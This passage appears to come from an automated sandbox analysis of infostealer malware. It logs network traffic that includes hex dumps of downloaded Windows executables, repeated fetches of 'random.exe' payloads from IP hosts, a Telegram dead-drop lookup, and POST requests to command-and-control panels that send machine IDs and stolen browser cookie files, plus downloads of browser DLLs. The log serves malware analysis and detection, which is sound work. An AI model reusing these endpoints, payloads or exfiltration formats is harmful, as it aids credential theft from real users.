71 74 74 61 6c 71 00 70 2a 00 00 b0 06 00 00 70 2a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 6a 73 72 6c 61 66 64 00 10 00 00 00 20 31 00 00 04 00 00 00 08 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 31 00 00 22 00 00 00 0c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:54:56 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Dec 2024 12:54:59 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
                          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=4325bdd3d696776e18_8917033688022161950
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014790001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014791001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014792001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014793001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="hwid"DB784EFF4CA42936050476------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="build"stok------FCAECAKKFBGCBGDGIEHC--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="message"browsers------AFHJJEHIEBKKFIDHDGHJ--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="message"plugins------KEGIDHJKKJDGCBGCGIJK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"fplugins------JKECFCFBGDHIECAAFIID--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGIJEHIIDGCFHIEGDGCHost: 185.215.113.206Content-Length: 6187Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014794001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014795001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------DGHJEHJJDAAAKEBGCFCA--
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="file"------BFBFBFIIJDAKECAKKJEH--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="file"------CFHDHIJDGCBAKFIEGHCB--
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014796001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
